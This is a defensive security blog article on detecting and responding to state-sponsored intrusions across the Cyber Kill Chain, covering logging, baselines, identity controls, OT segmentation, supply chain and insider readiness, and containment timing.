The following sections cover how state-sponsored actors operate across the Cyber Kill Chain, why their techniques demand different detection and response approaches, and what organizations need to have in place before, during, and after an intrusion to mount an effective response.
Same Kill Chain, different objective
Every cyber attack, from commodity ransomware to state-sponsoredespionage, follows the same fundamental sequence as the Cyber Kill Chain developed by Lockheed Martin: reconnaissance, weaponization, delivery, exploitation, installation, command and control (C2), and action on objectives. State-sponsored actors do not deviate from this sequence. They execute each phase with greater patience, greater precision, and a fundamentally different objective.
A financially motivated attacker requires the target to know it has been compromised. The ransomware note, the leak site, and the negotiation channel are all components of the business model. A state-sponsored actor requires the opposite. Whether the objective is espionage, intellectual property theft, or pre-positioning for future disruption, success depends on the target remaining unaware. That requirement for covertness shapes every technical decision the actor makes and determines what defenders need to look for at each phase. The following are common trends that change the dimensions of defense:
Reconnaissance: This stage tends to be deeper and more prolonged. Where a financially motivated actor might scan for exposed Remote Desktop Protocol (RDP) and move on, a state-sponsored adversary may spend weeks or months mapping an organization’s personnel, technology stack, vendor relationships, and communication patterns, often entirely outside the target’s perimeter through open-source intelligence (OSINT) and social engineering of adjacent organizations. This phase frequently leaves no artifacts in defender logs. State-sponsored actors also have lawful access laws in their respective countries that allow them to obtain some of this data without the target being aware that any reconnaissance is taking place.
Initialaccess: State-sponsored adversaries can afford to expend significant capabilities against a single target, including zero-days or supply chain vectors that signature-based detection will not identify. More commonly, however, they use legitimate credentials obtained through spear phishing or supply chain compromise, which produce no exploit signature at all.
Lateralmovement: This is where the covert imperative becomes most technically consequential. Rather than deploying custom malware, state-sponsored actors increasingly operate using tools already present on the target’s systems, such as PowerShell, WMI, and PsExec, or they take time to observe what tools are used in the environment. If the environment uses SCCM or Puppet to manage infrastructure, the state-sponsored actor will aim to gain access to these systems and use legitimate deployment methods to compromise additional hosts. When Active Directory is queried through PowerShell, the security stack registers a routine administrative task, because it is indistinguishable from one. Extended dwell times result not from slow operational tempo, but from deliberate use of trusted tools to minimize the detection surface.
Persistence: State-sponsored actors operate on the assumption that any single access method may be discovered and therefore establish multiple mechanisms across different parts of the infrastructure. Think aboutscheduled tasks, modified service configurations, dormant accounts, and firmware-level implants. These footholds may remain inactive for extended periods, activating only when an intelligence requirement or geopolitical trigger demands it.
Action onobjectives: This stage may not resemble what most teams would identify as an incident. If the objective is long-term data collection, exfiltration is structured to blend into normal traffic patterns. If the objective is pre-positioned disruption, as CISA assessed with Volt Typhoon in U.S. critical infrastructure, the actor may take no visible action during peacetime. Salt Typhoon’s access to lawful intercept systems required no disruptive action to deliver intelligence value. The access itself was the operation. When that access gets used is a separate question.
Anti-forensics: Advanced actors clear event logs, manipulate file timestamps, operate in memory where possible, and use encrypted channels that leave minimal artifacts. Attribution may be further complicated by the deliberate planting of indicators associated with a different threat actor.
Detection methodology does not require reinvention. The Kill Chain remains the same. It does, however, need to be calibrated for an adversary that treats every phase as an exercise in remaining invisible, that can operate using the target’s own tooling, and that measures success in months of undetected access.
Attribution
Attribution in the context of incident response deserves a straightforward treatment, because it is frequently misunderstood and its operational relevance is often overstated at the tactical level. Technical attribution, associating an intrusion with a known threat actor based on tactics, techniques, and procedures (TTPs); infrastructure; and malware characteristics is possible with varying degrees of confidence and is useful primarily for informing the threat model and anticipating likely next steps. An organization that can assess with reasonable confidence that Volt Typhoon is responsible for an intrusion can make better-informed decisions about what systems to prioritize, what persistence mechanisms to hunt for, and what the likely objectives are. Political attribution, the public or legal assignment of responsibility to a state-sponsored actor, is a government function -not a security team function – and attempting it without the intelligence resources to support it creates more risk than it resolves.
The practical implication for incident response teams is that TTPs and infrastructure indicators should be shared with national authorities and relevant Information Sharing and Analysis Centers (ISACs), who are better positioned to place them in a broader intelligence context. Internal response should focus on containment, scope determination, and recovery regardless of whether attribution is ever formally established.
Preparing for the long game
Encountering a state-sponsored actor during incident response is not the time to discover logging gaps, missing baselines, or that the legal team has never discussed intelligence sharing with government agencies. The following sections cover the areas where preparation most directly determines whether detection and response are feasible.
Logging and visibility
Default logging configurations are not sufficient for detecting the techniques described above.
Windowsprocesscreation (Event ID 4688): Enable full command-line argument logging to track exact parameters used during process execution.
PowerShellscriptblocklogging (Event ID 4104): Capture the actual code being executed, not just the fact that PowerShell was launched.
Sysmon: Deploy with a configuration tuned to detect suspicious parent-child process relationships, flagging legitimate binaries used as proxies for malicious activity, both on Windows and Linux environments.
Strategicprioritization: If a full Sysmon rollout is impractical, prioritize critical servers, externally facing web applications, and cloud environments. Deploying Sysmon everywhere is sometimes not feasible due to very extensive and noisy logging. Prioritization is important here.
Centralizedlogaggregation: Forward all logs to a write-once, centralized location, as sophisticated actors routinely clear local event logs, permanently destroying evidence left on compromised hosts
More broadly, visibility needs to extend across identity systems, endpoints, network infrastructure, and cloud environments.
Endpoint telemetry alone is insufficient. State-sponsored actors operating through legitimate tools will generate process events that are difficult to distinguish from normal administrative activity, and network-layer visibility provides an independent detection plane that host-based logging cannot replace.
NetFlowanalysis: Connection metadata without payload content is sufficient to identify unusual communication patterns, including beaconing behavior characteristic of C2 channels and lateral movement between systems that have no operational reason to communicate.
DNSlogging: Many C2 frameworks rely on DNS for command delivery and exfiltration. A host suddenly querying domains it has never previously resolved, or generating abnormal DNS query volumes, warrantsinvestigation.
Encryptedtrafficanalysis: Machine learning models can identify C2 communication patterns in TLS sessions without breaking encryption, based on session timing, packet size distributions, and connection frequency. These capabilities do not require deep packet inspection and remain viable where privacy or compliance constraints limit payload visibility.
Behavioral baselines
CISA’s joint advisory on living-off-the-land techniques recommends maintaining continuous baselines across network traffic, user behavior, administrative tool usage, and application activity. The emphasis on “continuously” is not incidental. A baseline established once and left unattended can generate more problems than it resolves, creating false confidence that normal has been adequately defined, when in reality theorganization has moved on. Baselines need to reflect seasonal patterns, organizational changes, infrastructure updates, and role transitions. When an administrator changes teams, their access patterns shift. When a new application is deployed, new NetFlow patterns emerge. If the baseline fails to keep pace, genuine threats blend into an outdated picture of normal, and anomaly detection becomes a source of noise rather than signal.
Statistical anomaly detection can surface the low-and-slow deviations characteristic of state-sponsored lateral movement, but tuning is an ongoing commitment, and false positive management carries a real operational cost that should not be underestimated.
State-sponsored actors do not typically maintain access through malware alone. Once inside, they move through identity infrastructure. Privileged access management deserves explicit treatment: administrative accounts should operate on a tiered model that prevents domain administrator credentials from being exposed on workstations, and service accounts should be scoped to the minimum access their function requires. Detection logic needs to account for credential abuse patterns that do not involve any malicious tooling. Pass-the-hash and pass-the-ticket attacks use legitimate authentication protocols and will not trigger antivirus. Kerberoasting, where an attacker requests service tickets for offline cracking, is visible in Kerberos event logs but only if those logs are collected and someone is looking. Anomalous authentication patterns, such as accounts authenticating at unusual hours, from unusual sources, or against systems they have never previously accessed, are among the more reliable behavioral signals available, provided the baseline exists to contextualize them.
Operational security (OPSEC)
If a state-sponsored breach is confirmed, the response needs to assume the adversary can see internal communications. If they have domain admin access, they can likely read email. If they have compromised a collaboration platform, they may be able to see the incident response channel. Here are some of the common aspects that should be considered:
Out-of-bandcommunications: Use encrypted channels on separate, unconnected devices to ensure investigative communications remain outside the compromised infrastructure.
Compartmentalization: Limit knowledge of the investigation to essential personnel only, as each additional person aware of the response is a potential vector for the adversary to detect the investigation.
Pre-establishedauthoritycontacts: Maintain established relationships with national authorities, CERTs, and intelligence agencies before a crisis occurs, rather than identifying the right contacts during an active incident.
Organizations should also have a pre-established relationship with national authorities, including the relevant contacts at national CERTs or intelligence agencies, rather than trying to find the right person during a crisis.
OT and Industrial Control System (ICS) readiness
For organizations with OT environments, the threat model extends beyond what most IT-centric IR plans address.
The IT-OT boundary that appears on network diagrams is a logical construct, and state-sponsored actors treat it as a lateral movement path rather than a barrier. Volt Typhoon demonstrated this in concrete terms by moving from compromised IT infrastructure toward OT-adjacent systems, including those controlling water treatment plants and electrical substations. Through 2025, the group progressed from IT reconnaissance to directly interacting with OT network-connected devices and extracting sensor and operational data, representing a transition from passive espionage to what amounts to a sabotage-ready foothold, maintained quietly and positioned for activation when circumstances require it. Important aspects are:
Availability as asafetyconstraint: OT systems often cannot be taken offline for forensic imaging, as production shutdowns in energy, water, or manufacturing carry significant safety and economic consequences.Investigations must work around live systems.
Patchingconstraints: Many OT systems run legacy software that cannot be updated without vendor involvement, making virtual patching through IDS/IPS rules the only viable near-term remediation option.
Insufficientsoftware-definedsegmentation: IT/OT boundaries relying solely on software-defined controls are inadequate, as a compromised account with sufficient privileges can reconfigure them.
Hardware-enforcedunidirectionalgateways: Data diodes provide a physical, deterministic guarantee of network separation that cannot be overridden by a compromised account or software misconfiguration.
Regulatoryalignment: Both CISA and the UK’s NCSC recommend engineering-based, deterministic protections for OT boundaries as the baseline standard.
Supply chain readiness
Vendors, software dependencies, and network infrastructure are all extensions of the trust boundary, and preparing for supply chain compromise means understanding those dependencies and having response procedures ready before one of them is exploited. Some critical measures are as follows:
Software Bill of Materials (SBOM): Maintain an SBOM for all applications and monitor it against vulnerability databases using automated tooling, connected directly to infrastructure.
Contractualincidentnotification: Enforce 24-hour disclosure clauses in vendor contracts to ensure timely notification of compromise, preventing containment windows from closing before the organization is aware.
Pre-authorized IRprocedures: Define in advance what gets revoked, what gets isolated, and who makes the call for each vendor integration, eliminating delays while an adversary continues to operate.
Firmwareinventory: Maintain a firmware inventory with patch status for every network device, including firewalls, routers, switches, and VPN concentrators.
Legacy andend-of-life(EOL)devices: Apply compensating controls such as network isolation, enhanced monitoring, and virtual patching to devices that can no longer receive patches, as they represent supply chain risk sitting inside the perimeter.
Insider threat readiness
In the state-sponsored context, the insider threat is not about a disgruntled employee stealing files. It is a structured intelligence operation that uses the hiring process itself as an attack vector, and preparation requires a cross-functional program spanning security, HR, legal, and finance because the indicators span all four domains.
For planted insiders, the DPRK IT worker scheme being the most documented example, hiring verification needs to go beyond standard background checks. This includes live, multi-stage video interviews with liveness verification that current deepfake technology cannot reliably defeat (for now), digital footprint validation across independent data sources, detection of VoIP phone numbers and shared credentials across applications, and cross-referencing candidate information for the kinds of inconsistencies a fabricated identity cannot fully conceal.
For all insider categories, behavioral baselines and data loss prevention policies should be in place before an incident occurs. Legal pre-authorization for employee monitoring is also important to establish ahead of time. Trying to build that legal framework during an active investigation will either delay the response or create legal exposure.
Why your IR plan needs revisiting
If your current IR plan covers malware and ransomware but typically it does not address supply chain compromise, insider threats, or living-off-the-land techniques. Most IR plans simply reflect a threat landscape that has already shifted. These gaps should be addressed through distinct playbooks, each with its own containment decision trees, evidence collection procedures, legal coordination requirements, and recovery verification steps. Each playbook should be tested through tabletop exercises built around realistic scenarios.
One aspect of state-sponsored incident response sets it apart from criminal incident response is that the adversary may be observing the response in real time, will likely attempt to regain access after eviction, and the diplomatic, legal, and intelligence dimensions of the incident extend well beyond the security operations center.
The containment decision in a state-sponsored incident is rarely straightforward. Treating it as a binary choice between immediate isolation and inaction understates the complexity involved. In a criminal incident, early containment is almost always the correct approach. In a state-sponsored incident, premature containment can eliminate the opportunity to understand the full scope of the adversary’s access, forfeit the ability to collect intelligence on their infrastructure, and signal to the adversary that they have been detected. That signal may trigger accelerated action on their objectives before defenses are fully in place.
The deliberate choice to monitor silently while the adversary operates introduces its own legal, ethical, and operational risks. That decision should never be made unilaterally by the SOC. It requires input from legal counsel and senior leadership, and in many cases a conversation with national authorities before it is exercised.
The incident response plan should define in advance who holds decision authority over containment timing, what criteria govern the transition from silent monitoring to active containment, and what evidence collection must be completed before containment begins. Tabletop exercises that do not incorporate this decision point are not adequately preparing teams for the reality of state-sponsored incident response.
Post-incident
After containment and recovery, the work is not finished. The intelligence collected during the incident has value beyond the organization that was targeted, and sharing it through ISACs and government channels contributes to a broader defensive picture that benefits the entire sector. Internally, the after-action review should map findings to MITRE ATT&CK, not as a compliance exercise but as a structured way to identify where detection failed, where response was too slow, and where controls need to be strengthened. That review should feed directly into updated detection logic, revised access controls, and adjusted monitoring priorities.
Threat hunting should not stop when the incident is closed. A state-sponsored actor that has been evicted will often attempt to regain access using different infrastructure or modified techniques, and sustained hunting focused on the specific actor’s TTPs is the most reliable way to catch that early. Tabletop exercises should also be updated to reflect what was learned, so the next time a similar scenario plays out, the team is not relearning the same lessons under pressure.
None of this is new guidance, but in the context of state-sponsored threats, where the adversary is persistent, well-resourced, and likely to return, these activities stop being procedural housekeeping and become direct preparation for the next intrusion.
Where to start when you have low budget, minimal staff, and competing priorities
Everything covered above assumes an organization can invest in logging, baselines, segmentation, supply chain controls, and dedicated IR planning in parallel. In reality, most security teams are operating under hiring freezes, flat budgets, and competing priorities, and the guidance to “do all of this” is not actionable without a sense of sequencing. The following is a pragmatic order of operations for teams that need to make meaningful progress without a step-change in resourcing.
Start with visibility, because you cannot defend what you cannot see. Before buying new tooling, turn on what you already own. Enabling Windows command-line logging (Event ID 4688), PowerShell script block logging (Event ID 4104), and centralized log forwarding costs nothing in licensing and addresses the single largest gap most organizations have. If logs are not being collected and retained centrally, no amount of downstream investment will compensate.
After this, prioritize identity over endpoints. State-sponsored actors move through credentials, not malware that can be easily fingerprinted, blocked, and made public through sandboxes. Enforcing multi-factor authentication (MFA) on all administrative accounts, implementing tiered admin models, and reviewing service account privileges typically delivers more risk reduction per hour invested than any endpoint initiative. These are configuration changes, not procurement cycles.
Next, focus monitoring where the adversary has to go. If Sysmon everywhere is not feasible, then deploy it on domain controllers, identity infrastructure, externally facing systems, and critical servers. An adversary pursuing meaningful objectives will eventually touch these systems, and concentrated visibility on them is more valuable than thin visibility everywhere.
The underlying principle is that state-sponsored readiness is not a single large investment. It is a sequence of smaller decisions where the early ones disproportionately determine whether the later ones are ever useful. Visibility and identity come first. Everything else builds on them.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-12 11:06:382026-05-12 11:06:38State-sponsored actors, better known as the friends you don’t want
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-12 07:06:412026-05-12 07:06:41Eyes wide open: How to mitigate the security and privacy risks of smart glasses
